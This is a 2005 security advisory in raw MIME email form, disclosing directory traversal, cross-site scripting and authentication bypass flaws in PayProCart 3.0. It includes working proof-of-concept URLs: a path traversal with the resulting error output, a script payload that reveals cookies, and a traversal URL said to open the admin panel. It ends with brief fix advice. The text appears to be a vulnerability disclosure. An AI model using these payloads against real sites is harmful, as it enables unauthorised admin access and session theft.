This is a multi-part message in MIME format. ------=_NextPart_000_0006_01C5395C.BF487B20 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Dcrab 's Security Advisory [Hsc Security Group] http://www.hackerscenter.com/ [dP Security] http://digitalparadox.org/ Get Dcrab's Services to audit your Web servers, scripts, networks, etc. = Learn more at http://www.digitalparadox.org/services.ah Severity: High Title: Authenticaion bypass, Directory transversal and XSS = vulnerabilities in PayProCart 3.0 - Profitcode Software Date: 05/04/2005 Vendor: ProftCode Softwares Vendor Website: http://www.profitcode.net Summary: There are, authenticaion bypass, directory transversal and xss = vulnerabilities in payprocart 3.0 - profitcode software. Proof of Concept Exploits:=20 http://localhost/index.php?modID=3D../EVIL_VALUE Directory Transversal Warning: main(tplates/../EVIL_VALUE.php) [function.main]: failed to open = stream: No such file or directory in /home/*******/web/*******/index.php = on line 159 Warning: main() [function.include]: Failed opening = 'tplates/../EVIL_VALUE.php' for inclusion = (include_path=3D'.:/usr/local/lib/php') in = /home/*******/web/*******/index.php on line 159 http://localhost/usrdetails.php?sgnuptype=3D%22%3E%3Cscript%3Ealert(docum= ent.cookie)%3C/script%3E Pops Cookie http://localhost/adminshop/index.php?proMod=3Dindex&%3bftoedit=3D..%2f= shopincs%2fmaintopENG Authentication Bypass, Gives access to Admin control panel After a couple seconds press stop and done, look done at the last = screen, thats the administration panel, you now have admin access to the = shopping cart. Possible Fixes: The usage of htmlspeacialchars(), mysql_escape_string(), = mysql_real_escape_string() and other functions for input validation = before passing user input to the mysql database, or before echoing data = on the screen, would solve these problems. Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah Author:=20 These vulnerabilties have been found and released by Diabolic Crab, = Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to = contact me regarding these vulnerabilities. You can find me at, = http://www.hackerscenter.com or http://digitalparadox.org/. Lookout for = my soon to come out book on Secure coding with php.=20 -----BEGIN PGP SIGNATURE----- Version: PGP 8.1 - not licensed for commercial use: www.pgp.com iQA/AwUBQlFhqSZV5e8av/DUEQIgwACgxNEQ+C4Sy3x6of/R5CF+klPpNEEAoJi3 UzBEsLKM5uDraMzb/rNUUrRU =3DzUyN -----END PGP SIGNATURE----- ------=_NextPart_000_0006_01C5395C.BF487B20 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Dcrab 's Security Advisory
[Hsc Security Group] http://www.hackerscenter.com/<= BR>[dP=20 Security] http://digitalparadox.org/

Get Dcrab's Services to audit your Web servers, scripts, networks, = etc.=20 Learn more at http://www.digitalpara= dox.org/services.ah

Severity: High
Title: Authenticaion bypass, Directory = transversal and=20 XSS vulnerabilities in PayProCart 3.0 - Profitcode Software
Date:=20 05/04/2005

Vendor: ProftCode Softwares
Vendor Website: http://www.profitcode.net
Summa= ry: There=20 are, authenticaion bypass, directory transversal and xss vulnerabilities = in=20 payprocart 3.0 - profitcode software.

Proof of Concept Exploits:

http://localhos= t/index.php?modID=3D../EVIL_VALUE
Directory=20 Transversal
Warning: main(tplates/../EVIL_VALUE.php) [function.main]: = failed=20 to open stream: No such file or directory in = /home/*******/web/*******/index.php=20 on line 159

Warning: main() [function.include]: Failed opening=20 'tplates/../EVIL_VALUE.php' for inclusion = (include_path=3D'.:/usr/local/lib/php')=20 in /home/*******/web/*******/index.php on line 159

http://localhost/usrdetails.php?sgnupty= pe=3D%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Pops=20 Cookie

http://localhost/adminshop/index.php?p= roMod=3Dindex&amp%3bftoedit=3D..%2fshopincs%2fmaintopENG
Authe= ntication=20 Bypass, Gives access to Admin control panel
After a couple seconds = press stop=20 and done, look done at the last screen, thats the administration panel, = you now=20 have admin access to the shopping cart.

Possible Fixes: The usage of htmlspeacialchars(),=20 mysql_escape_string(), mysql_real_escape_string() and other functions = for input=20 validation before passing user input to the mysql database, or before = echoing=20 data on the screen, would solve these problems.

Keep your self updated, Rss feed at: http://digitalparadox.org/rss.a= h

Author:
These vulnerabilties have been found and released by = Diabolic=20 Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel = free to=20
contact me regarding these vulnerabilities. You can find me at, http://www.hackerscenter.com = or http://digitalparadox.org/. = Lookout for my=20 soon to come out book on Secure coding with php.
-----BEGIN PGP=20 SIGNATURE-----
Version: PGP 8.1 - not licensed for commercial use: www.pgp.com

iQA/AwUBQlFhqSZV5e8av/DUEQIgwACgxNEQ+C4Sy3x6of/R5CF+klPpNEEAoJi3
= UzBEsLKM5uDraMzb/rNUUrRU
=3DzUyN
-----END=20 PGP SIGNATURE-----

------=_NextPart_000_0006_01C5395C.BF487B20--